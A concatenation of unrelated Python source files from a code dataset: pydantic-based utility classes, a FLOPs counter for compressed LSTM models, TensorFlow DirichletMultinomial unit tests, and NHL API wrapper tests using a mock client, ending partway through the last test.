INF = 32752 # infinity expressed in float16, this is large enough s.t. exp(-INF) == 0
TENSOR_TYPES = (th.Tensor, np.ndarray)
class ConfigClass:
"""
Base class for config storage classes. Defines representation for printing.
"""
def __repr__(self) -> str:
"""
Represent class attributes as key, value pairs.
Returns:
String representation of the config.
"""
str_repr = ["", "-" * 10 + " " + type(self).__name__]
for key, value in vars(self).items():
if key in ["config_orig"]:
continue
if isinstance(value, ConfigClass):
# str_repr += ["-" * 10 + " " + key, str(value)]
str_repr += [str(value)]
else:
str_repr += [f" {key} = {value}"]
return "\n".join(str_repr)
# ---------- SaveableBaseModel: Class for modeling and storing states. ----------
class SaveableBaseModel(BaseModel):
"""
Saveable version of pydantic BaseModel class.
"""
def save(self, file: Union[str, Path]) -> None:
"""
Save the model.
Args:
file: Target json file.
"""
try:
json.dump(self.dict(), Path(file).open("wt", encoding="utf8"))
except TypeError as e:
# something in the object is probably not JSON serializable.
print("---------- JSON encoding error! ----------")
for key, val in self.dict().items():
print(f"{key}: {type(val)}")
raise TypeError(f"See console output. JSON save to {file} failed.") from e
def load(self, file: Union[str, Path]) -> SaveableBaseModel:
"""
Load model values from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
for key, val in json.load(Path(file).open("rt", encoding="utf8")).items():
self.__setattr__(key, val)
return self
@classmethod
def create_from_file(cls, file: Union[str, Path]) -> SaveableBaseModel:
"""
Instantiate model from file.
Args:
file: Source json file.
Returns:
Class instance with values set from the file.
"""
return cls(**json.load(Path(file).open("rt", encoding="utf8")))
class Config:
# configure pydantic.BaseModel to fail on assigning wrongly typed values
validate_assignment = True
# ---------- TypedNamedTuple: Class for explicit data modeling. ----------
def _nested_shape_check(field_name: str, tensor_container: Any, shape: [List[Optional[int]]]) -> None:
"""
Check if input tensor matches the given shape. If input is iterable or mapping, recurse into it and check
if all contained tensors match the given shape.
Args:
field_name: Used to give a more verbose error.
tensor_container: Input tensor or container of tensors.
shape: Target shape to check.
Raises:
AssertionError (wrong shape), TypeError (wrong input type)
"""
if isinstance(tensor_container, TENSOR_TYPES):
value_shape = tensor_container.shape
err_msg = f"Shape mismatch, input {value_shape} defined {shape} on field {field_name}"
# check same number of dimensions
assert len(value_shape) == len(shape), err_msg
# check each dimension
for s1, s2 in zip(value_shape, shape):
# either target shape is arbitrary (None) or it matches input shape
assert s2 is None or s1 == s2, err_msg
elif isinstance(tensor_container, Iterable):
for tensor_subcontainer in tensor_container:
_nested_shape_check(field_name, tensor_subcontainer, shape)
elif isinstance(tensor_container, Mapping):
for _, tensor_subcontainer in tensor_container.items():
_nested_shape_check(field_name, tensor_subcontainer, shape)
else:
raise TypeError(f"Tensor shape check on class {type(tensor_container)} not supported, field {field_name}.")
class TypedNamedTuple(BaseModel):
"""
Behaves similar to NamedTuple. Includes type and shape validation.
Notes:
Implementation of pydantic BaseModel that can be instantiated with args instead of kwargs
Define class field _shape_dict to check shapes.
Args:
*args: Values for the model with same order as defined.
Examples:
>>> class ExampleTuple(TypedNamedTuple):
>>> key: str
>>> data: th.Tensor
>>> # shape check: first dimension arbitrary, second must match exactly
>>> _shapes_dict = {"key": (None, 6)}
>>> t = ExampleTuple("key", th.zeros(4, 6))
>>> t.key # access with field attribute
>>> t.dict()["key"] # access like a dict
>>> t.tuple()[0] # access like a tuple
"""
_shapes_dict: Dict[str, List[Optional[int]]] = {}
def __init__(self, *args, **kwargs):
assert len(args) <= len(self.__fields__), (f"Too many ({len(args)}) arguments "
f"for class {self.__class__.__name__}")
if len(args) > 0:
# fill the kwargs dict with (name, value) entries from args
for (field, _model_field), arg in zip(self.__fields__.items(), args):
assert field not in kwargs, f"Duplicate argument '{field}' for class {self.__class__.__name__}."
kwargs[field] = arg
# instantiate the model with that dict
super().__init__(**kwargs)
self.validate_shapes()
def __len__(self) -> int:
"""
Convenience function: length of the tuple
Returns:
Length.
"""
return len(self.__fields__)
def tuple(self) -> Tuple[Any]:
"""
Access the model values as tuple.
Returns:
Model values as tuple.
"""
return tuple(self.dict().values())
def dict(self, **kwargs) -> Dict[str, Any]: # pylint: disable=useless-super-delegation
"""
Overwrite this function for proper type hints.
Returns:
Model fields and values as dict.
"""
return super().dict(**kwargs)
def keys(self) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return self.dict().keys()
def items(self) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return self.dict().items()
def values(self) -> List[Any]:
"""
Return constant values.
Returns:
Constant values.
"""
return self.dict().values()
def validate_shapes(self):
"""
Use class field _shapes_dict to check if input tensors match the target shapes.
Returns:
"""
# loop all defined shapes
for key, shape in self._shapes_dict.items():
# get the field value with defined name
value = self.dict()[key]
# compare to target shape
_nested_shape_check(key, value, shape)
def to_cuda(self, *, non_blocking: bool = True) -> None:
"""
Convenience function: Move all tensors in the model to cuda.
Args:
non_blocking: Some PyTorch internal parameter, has something to do with pin_memory in dataloader.
Usually shouldn't hurt to keep it at True.
"""
# loop all tensors in the model
for name, value in self.dict().items():
if isinstance(value, th.Tensor):
# update pydantic BaseModel with setattr
setattr(self, name, value.cuda(non_blocking=non_blocking))
class Config:
# allow torch tensors etc.
arbitrary_types_allowed = True
# ---------- ConstantHolder: Container for constants ----------
class _StringRepr(type):
"""
Metaclass for overwriting result of str(Class).
"""
def __str__(cls) -> str:
"""
When calling str(Class), call Class._get_string_repr method.
Returns:
Custom class string representation.
"""
return cls._get_string_repr() # pylint: disable=no-value-for-parameter
def _get_string_repr(cls) -> str:
"""
Override this to return string representation of the class.
Returns:
Class representation as string.
"""
raise NotImplementedError
class ConstantHolder(metaclass=_StringRepr):
"""
Class to hold constants. Attributes must be uppercase. Cannot be instanced.
Notes:
There is some magic happening here:
The properties of this base class (_keys, _values, _dict) will hold all constants including those of inherited
classes. The interface will then dynamically return the correct things given the current cls.__name__.
Examples:
Instantiate the class and set constants as class attributes.
Set allowed_types to single type or list of types for value checks.
>>> class MyConstants(allowed_types=str):
>>> FIELD = "value"
Methods:
keys: Get list of constant keys.
values: Get list of constant values.
items: Get list of constant key/value tuples.
dict: Get dictionary of constant key/value pairs.
get: Get value given key, error if not found.
get_safe: Get value given key, return default if not found.
check_has_key: Returns bool whether or not the key is in the class.
assert_has_key: Raise error if the key is not found.
check_has_value: Returns bool whether or not the value is in the class.
assert_has_value: Raise error if the value is not found.
Notes:
Public interface: Methods keys, values, items, dict, get. Supports __getitem__ syntax (using []).
This class is introduced because enum.Enum has lots of unnecessary restrictions and is clumsy to use.
Public methods resemble those of a dict but return lists, not e.g. instances of dict_keys.
"""
# create the class properties with empty entries for the root parent
_keys: Dict[str, List[str]] = {"ConstantHolder": []}
_values: Dict[str, List[Any]] = {"ConstantHolder": []}
_dict: Dict[str, Dict[str, Any]] = {"ConstantHolder": {}}
# ---------- Public interface ----------
@classmethod
def keys(cls) -> List[str]:
"""
Get list of constant keys.
Returns:
Constant keys.
"""
return cls._keys[cls.__name__]
@classmethod
def values(cls) -> List[Any]:
"""
Return constant values.
Returns:
Constant values.
"""
return cls._values[cls.__name__]
@classmethod
def dict(cls) -> Dict[str, Any]:
"""
Return constant key-value pairs as dict.
Returns:
Constant keys.
"""
return cls._dict[cls.__name__]
@classmethod
def items(cls) -> List[Tuple[str, Any]]:
"""
Return constant key-value pairs as list of tuples like dict items.
Returns:
Constant keys.
"""
return list(zip(cls._keys[cls.__name__], cls._values[cls.__name__]))
@classmethod
def get(cls, key: str) -> Any:
"""
Get constant value given the key. Raise error if not found.
Args:
key: Constant key.
Returns:
Constant value.
"""
if key not in cls.keys():
raise IndexError(f"No key: {key} in {cls}")
return cast(Any, getattr(cls, key))
@classmethod
def get_safe(cls, key: str, default: Optional[Any] = None) -> Optional[Any]:
"""
Get constant value given the key. Return default if not found.
Args:
key: Constant key.
default: Value to return if key is not found, default None.
Returns:
Constant value or default.
"""
if key not in cls.keys():
return default
return cls.get(key)
@classmethod
def check_has_key(cls, key: str) -> bool:
"""
Check if the key is in the class.
Args:
key: Constant key.
Returns:
Whether or not the key is defined in the class.
"""
return key in cls.keys()
@classmethod
def assert_has_key(cls, key: str) -> None:
"""
Throw error if the key is not found in the class.
Args:
key: Constant key.
"""
assert cls.check_has_key(key), f"Key not found: {key} in {cls}"
@classmethod
def check_has_value(cls, value: Any) -> bool:
"""
Check if the value is in the class.
Args:
value: Constant value.
Returns:
Whether or not the key is defined in the class.
"""
return value in cls.values()
@classmethod
def assert_has_value(cls, value: str) -> None:
"""
Throw error if the value is not found in the class.
Args:
value: Constant value.
"""
assert cls.check_has_value(value), f"Value not found: {value} in {cls}"
# ---------- Private setup methods ----------
@classmethod
def _get_string_repr(cls) -> str:
"""
Return class name and content as string for better error messages.
Returns:
String representation.
"""
return f"ConstantHolder {cls.__name__}: {cls.items()}"
@classmethod
def __init_subclass__(cls, allowed_types: Optional[Union[type, List[type], Tuple[type, ...]]] = None) -> None:
"""
Setup properties for the public interface when this class is inherited.
This will be called on nested inheritance as well.
Args:
allowed_types: Optionally specify a type or list of types that are allowed for values.
By default all values are allowed.
"""
cls._keys[cls.__name__] = []
cls._values[cls.__name__] = []
cls._dict[cls.__name__] = {}
# add parent fields
for parent_cls in cls.__bases__:
cls._keys[cls.__name__] += cls._keys[parent_cls.__name__]
cls._values[cls.__name__] += cls._values[parent_cls.__name__]
cls._dict[cls.__name__].update(cls._dict[parent_cls.__name__])
# loop attributes, check correctness and extend the parent's class properties _keys, _values, _dict.
for key in cls.__dict__:
# ignore non-public fields
if key[0] == "_":
continue
# get the value of the constant
value = getattr(cls, key)
# ignore classmethods
if inspect.ismethod(value) and value.__self__ is cls:
continue
# make sure all constants are uppercase
assert key == key.upper(), f"Constant: {key} in class: {cls.__name__} must be uppercase."
# if allowed types is specified, make sure the value types are allowed
if allowed_types is not None:
# isinstance errors when fed lists instead of tuple, so convert lists to tuples
if isinstance(allowed_types, list):
allowed_types = tuple(allowed_types)
assert isinstance(value, allowed_types), (
f"Constant: {key} in class: {cls.__name__} must be of type {allowed_types}")
# update class properties
cls._keys[cls.__name__].append(key)
cls._values[cls.__name__].append(value)
cls._dict[cls.__name__][key] = value
def __init__(self) -> None:
"""
Raise error when trying to instance a ConstantHolder class.
"""
raise RuntimeError(f"Do not instance this class, it's a ConstantHolder: {type(self).__name__}")
|
the-stack_0_6205 | ################################################################################
# [VMLMF] Lowrank Matrix Factorization with Vector-Multiplication
# Project: Starlab
#
# Authors: Hyojin Jeon ([email protected]), Seoul National University
# U Kang ([email protected]), Seoul National University
#
# File: compression_cal.py
# - utilities for analyze compression results of VMLMF
#
# Version : 1.0
# Date : Oct 14, 2021
# Main Contact: Hyojin Jeon
#
# This software is free of charge under research purposes.
# For commercial purposes, please contact the authors.
#
################################################################################
# pylint: disable=C0103, E1101, C0114, R0902,C0116, R0914, R0913, C0123, W0613, W0102,C0413, E0401,R1719
"""
====================================
:mod:`compression_cal`
====================================
.. moduleauthor:: Hyojin Jeon <[email protected]>
설명
=====
모델의 파라미터 수와 FLOPs 수를 계산하기 위한 모듈입니다.
"""
import sys
sys.path.append('../')
def print_model_parm_nums(model):
"""print the number of parameters of the model
:param model: model to count parameters
"""
modelparams=sum(p.numel() for p in model.parameters())
print(f" + Number of params:{(modelparams/1e3):.2f}K")
def print_model_parm_flops(model,seq_len,args,modeltype="vmmodel"):
"""print FLOPs of the model
:param model: model to count FLOPs
:param seq_len: integer sequence length of the input data
:param args: argument user decided
:param modeltype: string type of the model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return
batch_size=args.batch_size
modeltype=args.model.lower() if modeltype != "mylstm" else "mylstm"
total_ops=count_lstm(model,seq_len,batch_size,modeltype)
total_ops+=count_linear(model,18) #linear의 iN_FEATURES,OUTFEATURE
print(f" + Number of FLOPs: {(total_ops / 1e6):.2f}M")
print(total_ops)
def print_model_parm_names(model):
"""print the name of parameters of the model
:param model: model to get parameters
"""
for idx,m in enumerate(model.modules()):
print( idx, '->', m )
print("Model's state_dict:")
for param_tensor in model.state_dict():
print(param_tensor, "\t", model.state_dict()[param_tensor].size())
def _count_lstm_cell(modeltype,input_size,hidden_size,wRank=None,uRank=None,bias=True):
"""count FLOPs of lstm/vmlmf cell
:param modeltype: string modeltype
:param input_size: integer input size of the model
:param hidden_size: integer hidden layer size of the model
:param wRank: input to hidden matrix rank of vmlmf
:param uRank: hjdden to hidden matrix rank of vmlmf
:param bias: whether the model share bias between for gates
:returns: FLOPs of a cell
"""
total_ops=0
isvmmodel = True if modeltype != "mylstm" else False
#vector-vector multiplication
input_dia_ops = input_size
hidden_dia_ops = hidden_size
#substract vec elem
if wRank is not None:
input_addition = (2*wRank-1)*input_size + hidden_size
if uRank is not None:
hidden_addition = (2*uRank-1)*hidden_size +hidden_size
input_ops=(2*input_size-1)*wRank+(2*wRank-1)*hidden_size \
if isvmmodel else (2*input_size-1)*hidden_size
hidden_ops=(2*hidden_size-1)*uRank+(2*uRank-1)*hidden_size\
if isvmmodel else (2*hidden_size-1)*hidden_size
state_ops=input_ops+hidden_ops + input_dia_ops + hidden_dia_ops +hidden_size*3 \
+input_addition + hidden_addition if isvmmodel else input_ops + hidden_ops + hidden_size
if bias:
state_ops+=hidden_size
total_ops+=state_ops*4
#hadamard addition (f*c + i*g )
total_ops+=hidden_size*3
#h'=o*tanh(c')
total_ops+=hidden_size
return total_ops
def count_lstm(model,seq_len,batch_size,modeltype):
"""count FLOPs of lstm/vmlmf layer
:param model: model object
:param seq_len: integer sequence length of the input data
:param batch_size: integer batch_size of the input data
:param modeltype: type of the model
:returns: FLOPs of LSTM model
"""
if modeltype in ['vmlmf_group','vmlmf_lm']:
print("Not Implemented")
return None
total_ops=0
total_ops+=_count_lstm_cell(modeltype,model.rnn.input_size,\
model.rnn.hidden_layer_sizes[0],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
for i in range(len(model.rnn.hidden_layer_sizes)-1):
total_ops+=_count_lstm_cell(modeltype,model.rnn.hidden_layer_sizes[i],\
model.rnn.hidden_layer_sizes[i+1],model.rnn.w_rank,model.rnn.u_ranks,bias=True)
total_ops*=seq_len
total_ops*=batch_size
return total_ops
def count_linear(model,output_size):
"""count FLOPs of linear layer
:param model: model object
:param output_size: integer output size of the model
:returns: FLOPs of linear layer
"""
input_size=model.rnn.hidden_layer_sizes[-1]
return input_size*output_size*2
|
the-stack_0_6206 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class DirichletMultinomialTest(tf.test.TestCase):
def testSimpleShapes(self):
with self.test_session():
alpha = np.random.rand(3)
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
self.assertEqual(3, dist.event_shape().eval())
self.assertAllEqual([], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([3]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([]), dist.get_batch_shape())
def testComplexShapes(self):
with self.test_session():
alpha = np.random.rand(3, 2, 2)
n = [[3., 2], [4, 5], [6, 7]]
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual(2, dist.event_shape().eval())
self.assertAllEqual([3, 2], dist.batch_shape().eval())
self.assertEqual(tf.TensorShape([2]), dist.get_event_shape())
self.assertEqual(tf.TensorShape([3, 2]), dist.get_batch_shape())
def testNproperty(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
self.assertEqual([1, 1], dist.n.get_shape())
self.assertAllClose(n, dist.n.eval())
def testAlphaProperty(self):
alpha = [[1., 2, 3]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1, alpha)
self.assertEqual([1, 3], dist.alpha.get_shape())
self.assertAllClose(alpha, dist.alpha.eval())
def testPmfNandCountsAgree(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
with self.assertRaisesOpError('Condition x >= 0.*'):
dist.pmf([-1., 4, 2]).eval()
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([3., 3, 0]).eval()
def testPmf_non_integer_counts(self):
alpha = [[1., 2, 3]]
n = [[5.]]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
dist.pmf([3.0, 0, 2.0]).eval()
# Both equality and integer checking fail.
with self.assertRaisesOpError('Condition x == y.*'):
dist.pmf([1.0, 2.5, 1.5]).eval()
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf([1., 2., 3.]).eval()
# Non-integer arguments work.
dist.pmf([1.0, 2.5, 1.5]).eval()
def testPmfBothZeroBatches(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [1., 0]
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 3., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesNontrivialN(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
# Both zero-batches. No broadcast
alpha = [1., 2]
counts = [3., 2]
dist = tf.contrib.distributions.DirichletMultinomial(5., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1 / 7., pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesMultidimensionalN(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [1., 2]
counts = [3., 2]
n = np.full([4, 3], 5., dtype=np.float32)
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
pmf = dist.pmf(counts)
self.assertAllClose([[1 / 7., 1 / 7., 1 / 7.]] * 4, pmf.eval())
self.assertEqual((4, 3), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenSameRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2]]
counts = [[1., 0], [0., 1]]
dist = tf.contrib.distributions.DirichletMultinomial([1.], alpha)
pmf = dist.pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfAlphaStretchedInBroadcastWhenLowerRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [1., 2]
counts = [[1., 0], [0., 1]]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 3.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenSameRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [[1., 0]]
pmf = tf.contrib.distributions.DirichletMultinomial(
[1., 1.], alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenLowerRank(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
with self.test_session():
alpha = [[1., 2], [2., 3]]
counts = [1., 0]
pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts)
self.assertAllClose([1 / 3., 2 / 5.], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfForOneVoteIsTheMeanWithOneRecordInput(self):
# The probabilities of one vote falling into class k is the mean for class
# k.
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts = np.zeros((3), dtype=np.float32)
counts[class_num] = 1
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
mean = dist.mean().eval()
pmf = dist.pmf(counts).eval()
self.assertAllClose(mean[class_num], pmf)
self.assertTupleEqual((3,), mean.shape)
self.assertTupleEqual((), pmf.shape)
def testMeanDoubleTwoVotes(self):
# The probabilities of two votes falling into class k for
# DirichletMultinomial(2, alpha) is twice as much as the probability of one
# vote falling into class k for DirichletMultinomial(1, alpha)
alpha = [1., 2, 3]
with self.test_session():
for class_num in range(3):
counts_one = np.zeros((3), dtype=np.float32)
counts_one[class_num] = 1.
counts_two = np.zeros((3), dtype=np.float32)
counts_two[class_num] = 2
dist1 = tf.contrib.distributions.DirichletMultinomial(1., alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(2., alpha)
mean1 = dist1.mean().eval()
mean2 = dist2.mean().eval()
self.assertAllClose(mean2[class_num], 2 * mean1[class_num])
self.assertTupleEqual((3,), mean1.shape)
def testVariance(self):
# Shape [2]
alpha = [1., 2]
ns = [2., 3., 4., 5.]
alpha_0 = np.sum(alpha)
# Diagonal entries are of the form:
# Var(X_i) = n * alpha_i / alpha_sum * (1 - alpha_i / alpha_sum) *
# (alpha_sum + n) / (alpha_sum + 1)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
# Off diagonal entries are of the form:
# Cov(X_i, X_j) = -n * alpha_i * alpha_j / (alpha_sum ** 2) *
# (alpha_sum + n) / (alpha_sum + 1)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [2, 2].
shared_matrix = np.array([
[variance_entry(alpha[0], alpha_0),
covariance_entry(alpha[0], alpha[1], alpha_0)],
[covariance_entry(alpha[1], alpha[0], alpha_0),
variance_entry(alpha[1], alpha_0)]])
with self.test_session():
for n in ns:
# n is shape [] and alpha is shape [2].
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
variance = dist.variance()
expected_variance = n * (n + alpha_0) / (1 + alpha_0) * shared_matrix
self.assertEqual((2, 2), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_n_alpha_broadcast(self):
alpha_v = [1., 2, 3]
alpha_0 = 6.
# Shape [4, 3]
alpha = np.array(4 * [alpha_v], dtype=np.float32)
# Shape [4, 1]
ns = np.array([[2.], [3.], [4.], [5.]], dtype=np.float32)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [4, 3, 3]
shared_matrix = np.array(4 * [[
[variance_entry(alpha_v[0], alpha_0),
covariance_entry(alpha_v[0], alpha_v[1], alpha_0),
covariance_entry(alpha_v[0], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[1], alpha_v[0], alpha_0),
variance_entry(alpha_v[1], alpha_0),
covariance_entry(alpha_v[1], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[2], alpha_v[0], alpha_0),
covariance_entry(alpha_v[2], alpha_v[1], alpha_0),
variance_entry(alpha_v[2], alpha_0)]]], dtype=np.float32)
with self.test_session():
# ns is shape [4, 1], and alpha is shape [4, 3].
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
variance = dist.variance()
expected_variance = np.expand_dims(
ns * (ns + alpha_0) / (1 + alpha_0), -1) * shared_matrix
self.assertEqual((4, 3, 3), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_multidimensional(self):
alpha = np.random.rand(3, 5, 4).astype(np.float32)
alpha2 = np.random.rand(6, 3, 3).astype(np.float32)
ns = np.random.randint(low=1, high=11, size=[3, 5, 1]).astype(np.float32)
ns2 = np.random.randint(low=1, high=11, size=[6, 1, 1]).astype(np.float32)
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(ns2, alpha2)
variance = dist.variance()
variance2 = dist2.variance()
self.assertEqual((3, 5, 4, 4), variance.get_shape())
self.assertEqual((6, 3, 3, 3), variance2.get_shape())
def testZeroCountsResultsInPmfEqualToOne(self):
# There is only one way for zero items to be selected, and this happens with
# probability 1.
alpha = [5, 0.5]
counts = [0., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(0., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1.0, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testLargeTauGivesPreciseProbabilities(self):
# If tau is large, we are doing coin flips with probability mu.
mu = np.array([0.1, 0.1, 0.8], dtype=np.float32)
tau = np.array([100.], dtype=np.float32)
alpha = tau * mu
# One (three sided) coin flip. Prob[coin 3] = 0.8.
# Note that since it was one flip, value of tau didn't matter.
counts = [0., 0, 1]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8, pmf.eval(), atol=1e-4)
self.assertEqual((), pmf.get_shape())
# Two (three sided) coin flips. Prob[coin 3] = 0.8.
counts = [0., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8**2, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
# Three (three sided) coin flips.
counts = [1., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(3., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(3 * 0.1 * 0.8 * 0.8, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
def testSmallTauPrefersCorrelatedResults(self):
# If tau is small, then correlation between draws is large, so draws that
# are both of the same class are more likely.
mu = np.array([0.5, 0.5], dtype=np.float32)
tau = np.array([0.1], dtype=np.float32)
alpha = tau * mu
# If there is only one draw, it is still a coin flip, even with small tau.
counts = [1., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.5, pmf.eval())
self.assertEqual((), pmf.get_shape())
# If there are two draws, it is much more likely that they are the same.
counts_same = [2., 0]
counts_different = [1, 1.]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf_same = dist.pmf(counts_same)
pmf_different = dist.pmf(counts_different)
self.assertLess(5 * pmf_different.eval(), pmf_same.eval())
self.assertEqual((), pmf_same.get_shape())
def testNonStrictTurnsOffAllChecks(self):
# Make totally invalid input.
with self.test_session():
alpha = [[-1., 2]] # alpha should be positive.
counts = [[1., 0], [0., -1]] # counts should be non-negative.
n = [-5.3] # n should be a non negative integer equal to counts.sum.
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf(counts).eval() # Should not raise.
if __name__ == '__main__':
tf.test.main()
|
the-stack_0_6207 | from datetime import date
import pytest
from nhlapi.endpoints import NHLAPI
from nhlapi.utils import Season
class MockClient:
def get(self, url, params=None):
self.url = url
self.params = params
def test_teams():
mock = MockClient()
api = NHLAPI(mock)
api.teams(8, expand=["foo", "bar"], stats="single")
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams"
assert mock.params["teamId"] == "8"
assert mock.params["expand"] == "foo,bar"
assert mock.params["stats"] == "single"
def test_teams_stats():
mock = MockClient()
api = NHLAPI(mock)
api.team_stats(8)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams/8/stats"
def test_teams_divisions():
mock = MockClient()
api = NHLAPI(mock)
api.divisions()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions"
def test_teams_divisions_id():
mock = MockClient()
api = NHLAPI(mock)
api.divisions(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions/1"
def test_teams_conferences():
mock = MockClient()
api = NHLAPI(mock)
api.conferences()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences"
def test_teams_conferences_id():
mock = MockClient()
api = NHLAPI(mock)
api.conferences(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences/1"
def test_people_simple():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000"
def test_people_stats():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000, stats="single", stats_season=Season(end=2018))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000/stats"
assert mock.params["stats"] == "single"
assert mock.params["season"] == "20172018"
def test_schedule_date():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(expand=["foo", "bar"], date=date(2018, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["expand"] == "foo,bar"
assert mock.params["date"] == "2018-01-01"
def test_schedule_team_range():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(8, start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["teamId"] == "8"
assert mock.params["startDate"] == "2018-01-01"
assert mock.params["endDate"] == "2018-06-01"
def test_schedule_bad_args():
mock = MockClient()
api = NHLAPI(mock)
with pytest.raises(ValueError):
api.schedule(date=date.today(), start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
def test_standings_season():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", season=Season(2017))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["season"] == "20172018"
def test_standings_date():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", date=date(2017, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["date"] == "2017-01-01"
def test_standings_bad_args():
mock = MockClient()
api = NHLAPI(mock)
